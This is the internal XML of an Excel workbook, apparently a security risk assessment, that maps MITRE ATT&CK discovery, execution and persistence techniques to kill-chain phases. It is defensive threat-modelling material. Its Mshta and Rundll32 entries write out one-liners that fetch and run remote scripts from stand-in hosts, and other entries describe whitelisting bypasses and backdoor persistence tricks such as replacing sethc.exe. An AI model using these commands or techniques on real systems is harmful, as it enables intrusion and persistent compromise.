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raymond/Documents/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="8_{F958FD3B-B0BF-1743-AE2B-48E74A32C91D}" xr6:coauthVersionLast="33" xr6:coauthVersionMax="33" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="460" windowWidth="28800" windowHeight="15940" activeTab="3" xr2:uid="{A393BF30-698B-EC42-BA03-C0E13580093F}"/>
  </bookViews>
  <sheets>
    <sheet name="Average risks LM" sheetId="5" r:id="rId1"/>
    <sheet name="Average risks Attack" sheetId="6" r:id="rId2"/>
    <sheet name="Distribution of controls " sheetId="7" r:id="rId3"/>
    <sheet name="Main values" sheetId="1" r:id="rId4"/>
    <sheet name="Translation" sheetId="2" r:id="rId5"/>
    <sheet name="Averages risks New Framework" sheetId="9" r:id="rId6"/>
    <sheet name="NewFramework" sheetId="8" r:id="rId7"/>
  </sheets>
  <externalReferences>
    <externalReference r:id="rId8"/>
    <externalReference r:id="rId9"/>
  </externalReferences>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">'Main values'!$A$1:$J$217</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="6" hidden="1">NewFramework!$A$1:$I$218</definedName>
  </definedNames>
  <calcPr calcId="179017"/>
  <pivotCaches>
    <pivotCache cacheId="0" r:id="rId10"/>
    <pivotCache cacheId="1"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7" l="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="2916" uniqueCount="587">
  <si>
    <t>ATTACKTECHNIQUENAME</t>
  </si>
  <si>
    <t>ATTACKTACTICNAME</t>
  </si>
  <si>
    <t>LMNAME</t>
  </si>
  <si>
    <t>TECHDESC</t>
  </si>
  <si>
    <t>Account Discovery</t>
  </si>
  <si>
    <t>Discovery</t>
  </si>
  <si>
    <t>AOO-Lateral</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of local system or domain accounts.</t>
  </si>
  <si>
    <t>Application Window Discovery</t>
  </si>
  <si>
    <t>AOO-Situationalawareness</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger</t>
  </si>
  <si>
    <t>Browser Bookmark Discovery</t>
  </si>
  <si>
    <t>AOO-Other</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</si>
  <si>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 associated with logins cached by a browser.
Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases</t>
  </si>
  <si>
    <t>File and Directory Discovery</t>
  </si>
  <si>
    <t>AOO-Collection</t>
  </si>
  <si>
    <t>Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Network Share Discovery</t>
  </si>
  <si>
    <t>Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.</t>
  </si>
  <si>
    <t>Password Policy Discovery</t>
  </si>
  <si>
    <t xml:space="preserve">
Password Policy Discovery
Technique
ID T1201
Tactic Discovery
Platform Linux, Windows, macOS
Permissions Required User
Data Sources Process command-line parameters, Process Monitoring
Contributors Sudhanshu Chauhan, @Sudhanshu_C
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</si>
  <si>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</si>
  <si>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</si>
  <si>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Permission Groups Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to find local system or domain-level groups and permissions settings.</t>
  </si>
  <si>
    <t>Process Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.</t>
  </si>
  <si>
    <t>Query Registry</t>
  </si>
  <si>
    <t>Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
The Registry contains a significant amount of information about the operating system, configuration, software, and security.1 Some of the information may help adversaries to further their operation within a network.</t>
  </si>
  <si>
    <t>Remote System Discovery</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</si>
  <si>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t>
  </si>
  <si>
    <t>Security Software Discovery</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</si>
  <si>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t>
  </si>
  <si>
    <t>System Information Discovery</t>
  </si>
  <si>
    <t>An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.</t>
  </si>
  <si>
    <t>System Network Configuration Discovery</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</si>
  <si>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t>
  </si>
  <si>
    <t>System Network Connections Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>System Service Discovery</t>
  </si>
  <si>
    <t>Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist, and "net start" using Net, but adversaries may also use other tools as well.</t>
  </si>
  <si>
    <t>System Time Discovery</t>
  </si>
  <si>
    <t>The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.12
An adversary may gather the system time and/or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/tz.2 The information could be useful for performing other techniques, such as executing a file with a Scheduled Task3, or to discover locality information based on time zone to assist in victim targeting.</t>
  </si>
  <si>
    <t>Drive-by Compromise</t>
  </si>
  <si>
    <t>Initial Access</t>
  </si>
  <si>
    <t>Delivery</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</si>
  <si>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
Multiple ways of delivering exploit code to a browser exist, including:
A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, cross-site scripting.
Malicious ads are paid for and served through legitimate ad providers.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occurring.1
Typical drive-by compromise process:
A user visits a website that is used to host the adversary controlled content.
Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version.
The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.
Upon finding a vulnerable version, exploit code is delivered to the browser.
If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.
In some cases a second visit to the website after the initial scan is required before exploit code is delivered.
Unlike Exploit Public-Facing Application, the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.</t>
  </si>
  <si>
    <t>Exploit Public-Facing Application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</si>
  <si>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SQL)2, standard services (like SMB3 or SSH), and any other applications with Internet accessible open sockets, such as web servers and related services.4 Depending on the flaw being exploited this may include Exploitation for Defense Evasion. For websites and databases, the OWASP top 10 gives a good list of the top 10 most common web-based vulnerabilities</t>
  </si>
  <si>
    <t>Hardware Additions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</si>
  <si>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tapping6, man-in-the middle encryption breaking7, keystroke injection8, kernel memory reading via DMA9, adding new wireless access to an existing network10, and others.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Spearphishing Attachment</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</si>
  <si>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</si>
  <si>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Spearphishing Link</t>
  </si>
  <si>
    <t>Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attachment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t>
  </si>
  <si>
    <t>Spearphishing via Service</t>
  </si>
  <si>
    <t>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</si>
  <si>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Supply Chain Compromise</t>
  </si>
  <si>
    <t>Supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise can take place at any stage of the supply chain including:
Manipulation of development tools
Manipulation of a development environment
Manipulation of source code repositories (public or private)
Manipulation of software update/distribution mechanisms
Compromised/infected system images (multiple cases of removable media infected at the factory)
Replacement of legitimate software with modified versions
Sales of modified/counterfeit products to legitimate distributors
Shipment interdiction
While supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.111213 Targeting may be specific to a desired victim set14 or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.</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</si>
  <si>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</si>
  <si>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 used by the other party for access to internal network systems may be compromised and used.</t>
  </si>
  <si>
    <t>Valid Accounts</t>
  </si>
  <si>
    <t>Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access.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Adversaries may also create accounts, sometimes using pre-defined account names and passwords, as a means for persistence through backup access in case other means are unsuccessful.
The overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.</t>
  </si>
  <si>
    <t>Execution</t>
  </si>
  <si>
    <t>Exploitation</t>
  </si>
  <si>
    <t>CMSTP</t>
  </si>
  <si>
    <t>The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles.1 CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
Adversaries may supply CMSTP.exe with INF files infected with malicious commands.2 Similar to Regsvr32 / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs3 and/or COM scriptlets (SCT) from remote servers.45 This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application.
CMSTP.exe can also be abused to Bypass User Account Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface</t>
  </si>
  <si>
    <t>Control Panel Items</t>
  </si>
  <si>
    <t>Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.12 Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.123
For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.1
Adversaries can use Control Panel items as execution payloads to execute arbitrary commands. Malicious Control Panel items can be delivered via Spearphishing Attachment campaigns 23 or executed as part of multi-stage malware.4 Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.</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</si>
  <si>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</si>
  <si>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may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.123
Adversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands45, directly or through embedded files6, and used to deliver execution via phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.7 DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.</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</si>
  <si>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API.1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&lt;file name="filename.extension" loadFrom="fully-qualified or relative pathname"&gt; in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.
Adversaries can use this functionality as a way to execute arbitrary code on a system.</t>
  </si>
  <si>
    <t>Exploitation for Client Execution</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</si>
  <si>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t>
  </si>
  <si>
    <t>Graphical User Interface</t>
  </si>
  <si>
    <t>Cause a binary or script to execute based on interacting with the file through a graphical user interface (GUI) or in an interactive remote session such as Remote Desktop Protocol.</t>
  </si>
  <si>
    <t>InstallUtil</t>
  </si>
  <si>
    <t>InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries.1 InstallUtil is located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe and C:\Windows\Microsoft.NET\Framework64\v&lt;version&gt;\InstallUtil.exe.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</si>
  <si>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</si>
  <si>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process.1
Adversaries may target lsass.exe drivers to obtain execution and/or persistence. By either replacing or adding illegitimate drivers (e.g., DLL Side-Loading or DLL Search Order Hijacking), an adversary can achieve arbitrary code execution triggered by continuous LSA operations.</t>
  </si>
  <si>
    <t>Mshta</t>
  </si>
  <si>
    <t>Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension .hta.1 HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.2
Adversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code34567
Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta
Mshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.</t>
  </si>
  <si>
    <t>PowerShell</t>
  </si>
  <si>
    <t>PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.1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Empire,2 PowerSploit,3 and PSAttack</t>
  </si>
  <si>
    <t>Regsvcs/Regasm</t>
  </si>
  <si>
    <t>Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft.12
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t>
  </si>
  <si>
    <t>Regsvr32</t>
  </si>
  <si>
    <t>Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries.1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executed.2 This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments.34
Regsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via Component Object Model Hijacking.</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</si>
  <si>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</si>
  <si>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be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute.1
Rundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks</t>
  </si>
  <si>
    <t>Scheduled Task</t>
  </si>
  <si>
    <t>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system.1
An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.</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</si>
  <si>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</si>
  <si>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Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macos being allowed or that the user will accept to activate them.
Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit1, Veil2, and PowerSploit3 are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell.</t>
  </si>
  <si>
    <t>Service Execution</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</si>
  <si>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</si>
  <si>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t>Signed Binary Proxy Execution</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</si>
  <si>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t>
  </si>
  <si>
    <t>Third-party Software</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</si>
  <si>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</si>
  <si>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Trap</t>
  </si>
  <si>
    <t>The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where "command list" will be executed when "signals" are received.</t>
  </si>
  <si>
    <t>Trusted Developer Utilities</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</si>
  <si>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MSBuild
MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It takes XML formatted project files that define requirements for building various platforms and configurations.1
Adversaries can use MSBuild to proxy execution of code through a trusted Windows utility. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into the XML project file.2 MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution.3
DNX
The .NET Execution Environment (DNX), dnx.exe, is a software development kit packaged with Visual Studio Enterprise. It was retired in favor of .NET Core CLI in 2016.4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DNX.5
RCSI
The rcsi.exe utility is a non-interactive command-line interface for C# that is similar to csi.exe. It was provided within an early version of the Roslyn .NET Compiler Platform but has since been deprecated for an integrated solution.6 The rcsi.exe binary is signed by Microsoft.7
C# .csx script files can be written and executed with rcsi.exe at the command-line. An adversary can use rcsi.exe to proxy execution of arbitrary code to bypass application whitelisting policies that do not account for execution of rcsi.exe.7
WinDbg/CDB
WinDbg is a Microsoft Windows kernel and user-mode debugging utility. The Microsoft Console Debugger (CDB) cdb.exe is also user-mode debugger. Both utilities are included in Windows software development kits and can be used as standalone tools.8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utilities.9
It is likely possible to use other debuggers for similar purposes, such as the kernel-mode debugger kd.exe, which is also signed by Microsoft.
Tracker
The file tracker utility, tracker.exe, is included with the .NET framework as part of MSBuild. It is used for logging calls to the Windows file system.10
An adversary can use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions</t>
  </si>
  <si>
    <t>User Execution</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Windows Management Instrumentation</t>
  </si>
  <si>
    <t>Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB)1 and Remote Procedure Call Service (RPCS)2 for remote access. RPCS operates over port 135.3
An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement.</t>
  </si>
  <si>
    <t>Windows Remote Management</t>
  </si>
  <si>
    <t>Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).1 It may be called with the winrm command or by any number of programs such as PowerShell.</t>
  </si>
  <si>
    <t>Persistence</t>
  </si>
  <si>
    <t>Installation</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</si>
  <si>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</si>
  <si>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C:\Windows\System32\sethc.exe, launched when the shift key is pressed five times and C:\Windows\System32\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen.1
Depending on the version of Windows, an adversary may take advantage of these features in different ways because of code integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\, and it must be protected by Windows File or Resource Protection (WFP/WRP).2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C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over Remote Desktop Protocol will cause the replaced file to be executed with SYSTEM privileges.3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privileges.3
Other accessibility features exist that may also be leveraged in a similar fashion:2
On-Screen Keyboard: C:\Windows\System32\osk.exe
Magnifier: C:\Windows\System32\Magnify.exe
Narrator: C:\Windows\System32\Narrator.exe
Display Switcher: C:\Windows\System32\DisplaySwitch.exe
App Switcher: C:\Windows\System32\AtBroker.exe</t>
  </si>
  <si>
    <t>AppCert DLLs</t>
  </si>
  <si>
    <t>Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager are loaded into every process that calls the ubiquitously used application programming interface (API) functions:1
CreateProcess
CreateProcessAsUser
CreateProcessWithLoginW
CreateProcessWithTokenW
WinExec
Similar to Process Injection, this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.</t>
  </si>
  <si>
    <t>AppInit DLLs</t>
  </si>
  <si>
    <t>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library.1 Similar to Process Injection, these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.2
The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled.</t>
  </si>
  <si>
    <t>Application Shimming</t>
  </si>
  <si>
    <t>The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow backward compatibility of programs as Windows updates and changes its code. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.1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%WINDIR%\AppPatch\sysmain.sdb
hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb
Custom databases are stored in:
%WINDIR%\AppPatch\custom &amp; %WINDIR%\AppPatch\AppPatch64\Custom
hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom
To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to Bypass User Account Control (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to Hooking, utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.</t>
  </si>
  <si>
    <t>Authentication Package</t>
  </si>
  <si>
    <t>Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.1
Adversaries can use the autostart mechanism provided by LSA Authentication Packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=&lt;target binary&gt;. The binary will then be executed by the system when the authentication packages are loaded.</t>
  </si>
  <si>
    <t>BITS Jobs</t>
  </si>
  <si>
    <t>Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM)1.2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 2 and the BITSAdmin tool.3
Adversaries may abuse BITS to download, execute, and even clean up after malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.456 BITS enabled execution may also allow Persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).74
BITS upload functionalities can also be used to perform Exfiltration Over Alternative Protocol.</t>
  </si>
  <si>
    <t>Bootkit</t>
  </si>
  <si>
    <t>A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR).1
Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.</t>
  </si>
  <si>
    <t>Browser Extensions</t>
  </si>
  <si>
    <t xml:space="preserve">Browser extensions or plugins are small programs that can add functionality and customize aspects of internet browsers. They can be installed directly or through a browser's app store. Extensions generally have access and permissions to everything that the browser can access.12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uploaded.3 Once the extension is installed, it can browse to websites in the background,45 steal all information that a user enters into a browser, to include credentials,67 and be used as an installer for a RAT for persistence. There have been instances of botnets using a persistent backdoor through malicious Chrome extensions.8 There have also been similar examples of extensions being used for command &amp; control </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</si>
  <si>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</si>
  <si>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access.12 Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
System file associations are listed under HKEY_CLASSES_ROOT\.[extension], for example HKEY_CLASSES_ROOT\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\[handler]\shell\[action]\command. For example:
HKEY_CLASSES_ROOT\txtfile\shell\open\command
HKEY_CLASSES_ROOT\txtfile\shell\print\command
HKEY_CLASSES_ROOT\txtfile\shell\printto\command
The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to execute arbitrary commands.</t>
  </si>
  <si>
    <t>Component Firmware</t>
  </si>
  <si>
    <t>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</si>
  <si>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Component Object Model Hijacking</t>
  </si>
  <si>
    <t>The Microsoft Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system.1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instead.2 An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.</t>
  </si>
  <si>
    <t>Create Account</t>
  </si>
  <si>
    <t>Adversaries with a sufficient level of access may create a local system or domain account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
The net user commands can be used to create a local or domain account.</t>
  </si>
  <si>
    <t>DLL Search Order Hijacking</t>
  </si>
  <si>
    <t>Windows systems use a common method to look for required DLLs to load into a program.1 Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence.
Adversaries may perform DLL preloading, also called binary planting attacks,2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DLL.3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escalation.456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</si>
  <si>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</si>
  <si>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
Adversaries may use remote services to access and persist within a network.1 Access to Valid Accounts to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network. Access to remote services may be used as part of Redundant Access during an operation.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Hooks procedures, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.12
Import address table (IAT) hooking, which use modifications to a process’s IAT, where pointers to imported API functions are stored.234
Inline hooking, which overwrites the first bytes in an API function to redirect code flow.254
Similar to Process Injection,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Access.6
Hooking is commonly utilized by Rootkits to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors</t>
  </si>
  <si>
    <t>Hypervisor</t>
  </si>
  <si>
    <t>A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware.1 It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen.2 A type-1 hypervisor operates at a level below the operating system and could be designed with Rootkit functionality to hide its existence from the guest operating system.3 A malicious hypervisor of this nature could be used to persist on systems through interruption.</t>
  </si>
  <si>
    <t>Image File Execution Options Injection</t>
  </si>
  <si>
    <t>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notepad.exe”).1
IFEOs can be set directly via the Registry or in Global Flags via the Gflags tool.2 IFEOs are represented as Debugger Values in the Registry under HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options/&lt;executable&gt; and HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\&lt;executable&gt; where &lt;executable&gt; is the binary on which the debugger is attached.1
Similar to Process Injection, this value can be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer.3 Installing IFEO mechanisms may also provide Persistence via continuous invocation.
Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications.</t>
  </si>
  <si>
    <t>Logon Scripts</t>
  </si>
  <si>
    <t>Windows
Windows allows logon scripts to be run whenever a specific user or group of users log into a system.1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Mac
Mac allows login and logoff hooks to be run as root whenever a specific user logs into or out of a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike startup items, a login hook executes as root2. There can only be one login hook at a time though. If adversaries can access these scripts, they can insert additional code to the script to execute their tools when a user logs in.</t>
  </si>
  <si>
    <t>Modify Existing Service</t>
  </si>
  <si>
    <t>Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and Reg.
Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of Masquerading that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.
Adversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands.</t>
  </si>
  <si>
    <t>Netsh Helper DLL</t>
  </si>
  <si>
    <t>Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.1 The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh.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netsh.exe.2
Proof of concept code exists to load Cobalt Strike's payload using netsh.exe helper DLLs.</t>
  </si>
  <si>
    <t>New Service</t>
  </si>
  <si>
    <t>When operating systems boot up, they can start programs or applications called services that perform background system functions.1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t>
  </si>
  <si>
    <t>Office Application Startup</t>
  </si>
  <si>
    <t>Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started.
Office Template Macros
Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts.1
Office Visual Basic for Applications (VBA) macros2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loaded.34
Word Normal.dotm location:C:\Users\(username)\AppData\Roaming\Microsoft\Templates\Normal.dotm
Excel Personal.xlsb location:C:\Users\(username)\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB
An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.
Office Test
A Registry location was found that when a DLL reference was placed within it the corresponding DLL pointed to by the binary path would be executed every time an Office application is started5
HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf
Add-ins
Office add-ins can be used to add functionality to Office programs.6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t>
  </si>
  <si>
    <t>Path Interception</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</si>
  <si>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function.1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t>
  </si>
  <si>
    <t>Port Monitors</t>
  </si>
  <si>
    <t>A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.1 This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.2 Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. The Registry key contains entries for the following:
Local Port
Standard TCP/IP Port
USB Monitor
WSD Port
Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.</t>
  </si>
  <si>
    <t>Screensaver</t>
  </si>
  <si>
    <t>Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.1 The Windows screensaver application scrnsave.exe is located in C:\Windows\System32\ along with screensavers included with base Windows installations. The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence:
SCRNSAVE.exe - set to malicious PE path
ScreenSaveActive - set to '1' to enable the screensaver
ScreenSaverIsSecure - set to '0' to not require a password to unlock
ScreenSaverTimeout - sets user inactivity timeout before screensaver is executed
Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.</t>
  </si>
  <si>
    <t>Security Support Provider</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>Service Registry Permissions Weakness</t>
  </si>
  <si>
    <t>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permissions.1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FailureCommand) that may be executed in an elevated context anytime the service fails or is intentionally corrupted.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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computer.123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</si>
  <si>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Time Providers</t>
  </si>
  <si>
    <t>The Windows Time service (W32Time) enables time synchronization across and within domains.1 W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.2
Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\.2 The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.2
Adversaries may abuse this architecture to establish Persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account</t>
  </si>
  <si>
